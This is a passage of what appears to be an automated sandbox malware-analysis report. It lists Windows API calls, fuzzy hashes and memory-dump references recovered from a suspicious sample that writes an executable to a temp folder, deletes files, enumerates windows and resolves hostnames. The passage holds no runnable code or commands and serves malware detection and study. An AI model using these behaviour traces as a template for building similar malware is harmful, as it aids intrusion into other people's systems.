                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleHeap$AllocateProcessReadSize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1554977068-0
                                                                                                                                                                                                                                                      • Opcode ID: f319484c08961f7058206c12f5d498bb27d9632b74153328f5358bc5bd752ab7
                                                                                                                                                                                                                                                      • Instruction ID: 437f12209849ad53b107f50a2360d686c4f8b310406f18f1b6bf1e92a4d40f60
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f319484c08961f7058206c12f5d498bb27d9632b74153328f5358bc5bd752ab7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC01F9314442087FDB116BA59C85FEE7FB8DF05374F04006AF941761E1DA7A0A97C769
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00409404,76AE83C0,?,?,00409404), ref: 004092AA
                                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000000,0000000E,00409264,00000000), ref: 004092C2
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00409404), ref: 004092C9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Library$AttributesEnumFileFreeLoadNamesResource
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2488163118-0
                                                                                                                                                                                                                                                      • Opcode ID: 9f6b4d6cef0f2ea5774dd501f037b3dceafdfd7fed8f049d80365b9b6919557a
                                                                                                                                                                                                                                                      • Instruction ID: 5d606b248aeee1f7ae5c7b3174170a0de79bc4e61d012c978a38f7f46c235745
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f6b4d6cef0f2ea5774dd501f037b3dceafdfd7fed8f049d80365b9b6919557a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFE06D32601218FBDB219FA1ED09FDE7AA8EF0075AF0401A5FC01B1190D779CE129AA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1378416451-0
                                                                                                                                                                                                                                                      • Opcode ID: a7e7e2852162d901733bd9cb003451e439e81ea291194a1f39b14b788c7c5ea1
                                                                                                                                                                                                                                                      • Instruction ID: 4a430e91a8f863336b2687282291e13684705547ea1748166e0690fd64c8d12b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e7e2852162d901733bd9cb003451e439e81ea291194a1f39b14b788c7c5ea1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98E0C23639022077D7301737AC0EFA73DA9EBC6F31F040134FE01E2190C9644962C265
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00409456
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040947E
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                        • Part of subcall function 004092D5: Sleep.KERNEL32(00000005,?,?,00000000), ref: 004092E3
                                                                                                                                                                                                                                                        • Part of subcall function 004092D5: wsprintfA.USER32 ref: 00409304
                                                                                                                                                                                                                                                        • Part of subcall function 004092D5: FindFirstFileA.KERNEL32(?,?), ref: 0040932F
                                                                                                                                                                                                                                                        • Part of subcall function 004092D5: wsprintfA.USER32 ref: 00409379
                                                                                                                                                                                                                                                        • Part of subcall function 004092D5: FindClose.KERNEL32(00000000), ref: 00409427
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountFindTickwsprintf$CloseFileFirstFolderFromListLocationMallocPathSleepSpeciallstrcat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1771340629-0
                                                                                                                                                                                                                                                      • Opcode ID: de2d4fffb14a53561be6066af87212ad6e40e30e842f28538245181382f3ddf5
                                                                                                                                                                                                                                                      • Instruction ID: d43fa70b2e8546f669071ef85ae958b19b834022825b6d14a38872369a11e59a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de2d4fffb14a53561be6066af87212ad6e40e30e842f28538245181382f3ddf5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39112972D0021CFADF14E6A59C06BDE7B7C9F14314F1404EBFA04A7082D6B95EC68B58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnumWindows.USER32(004156F5,?), ref: 0041577E
                                                                                                                                                                                                                                                      • EnumWindows.USER32(004156F5,?), ref: 00415795
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnumWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1129996299-0
                                                                                                                                                                                                                                                      • Opcode ID: 8c3c258de0779b9c8e79a4f210a95e61b6b4d78123848c425870111b3621d7f7
                                                                                                                                                                                                                                                      • Instruction ID: 08bc3dfc3ca57a7b19c1323d72fd326351c4c93af85a7a59c5340015e754f61c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3c258de0779b9c8e79a4f210a95e61b6b4d78123848c425870111b3621d7f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F07F76E00208EB8B00DF99D8808DEFBB8AB89210B5080BBE515E3250D674AA448FA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00422C60,00000000,?,0042B7F8,00000060), ref: 00425BB0
                                                                                                                                                                                                                                                        • Part of subcall function 00427433: HeapAlloc.KERNEL32(00000000,00000140,00425BD8,000003F8,?,0042B7F8,00000060), ref: 00427440
                                                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(?,0042B7F8,00000060), ref: 00425BE3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$AllocCreateDestroy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2236781399-0
                                                                                                                                                                                                                                                      • Opcode ID: 515d63fb8d1a4909140f08a63f5b198cdef78c224400cc72ab3f26efe8c330c1
                                                                                                                                                                                                                                                      • Instruction ID: 7544e6c939ce91180a6ab0966c6dc760d355c7477ffebe0e505c52c9fcc3e56c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 515d63fb8d1a4909140f08a63f5b198cdef78c224400cc72ab3f26efe8c330c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE04870B547505BDB116F71BD0572A7EF4DB44757FD4043AF400C9190FB789550D50A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,00000000,0040D390,00000000), ref: 00414F15
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00414F23
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Attributes$Delete
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3735447641-0
                                                                                                                                                                                                                                                      • Opcode ID: 8ac88836f2ab90761ba2384d917984e8a8679a44354fc932b9654ae0036aab30
                                                                                                                                                                                                                                                      • Instruction ID: c8b0946db805fe60de2d8deca71c357936a8c388aae56265ab53df069b0f119a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac88836f2ab90761ba2384d917984e8a8679a44354fc932b9654ae0036aab30
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80D017322065316AA5153B66BC0AADF2B5D9F92326F02805BF94096190DF5C6AD307AE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: gethostbynameinet_addr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1594361348-0
                                                                                                                                                                                                                                                      • Opcode ID: eb76842224a1faf79450d25f8aee8274ca296761e667cb97ba039a537268e28f
                                                                                                                                                                                                                                                      • Instruction ID: 4bc32c79bd011178c67701030c92f42e53953f8fcabd8697eb53bb383bf72a4a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb76842224a1faf79450d25f8aee8274ca296761e667cb97ba039a537268e28f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CED09234204600DFCF119F24D98998AB7E5BF45722B5446A9F469D72B1CB35ED80AA09
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                      • Opcode ID: 969254deb2add1187b88b354c7ae7fe4fc641dc09986d8278be8f81eb28bda17
                                                                                                                                                                                                                                                      • Instruction ID: a6d593b0423ec023e5a7d9a3c9df955ab54794e0b81865e68d434db1e99dc6aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 969254deb2add1187b88b354c7ae7fe4fc641dc09986d8278be8f81eb28bda17
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7C04C35604201EBDF155F909A0CB4A7A68AB54702F40C414B646910A0A6B58491EF56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004596A4,776AC310,00000000,?,00000000,?,?,0040DC70), ref: 00410B4F
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004596A4), ref: 00410BC7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionlstrcatlstrcpy$EnterLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2748643047-0
                                                                                                                                                                                                                                                      • Opcode ID: f3a8277ca17723fda54409e048a50b36382ac72469a9019fcfd8bdcfa53f4e2c
                                                                                                                                                                                                                                                      • Instruction ID: 68974133c59aea05669214fb2f6e98e2e9ec4fd86eb8517214c824c61ba99a5f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3a8277ca17723fda54409e048a50b36382ac72469a9019fcfd8bdcfa53f4e2c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB01C43111C3499AE321A7A5A846BEB7A888B5275DF14005FF54411283DADE6CC883BF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A40
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A70
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
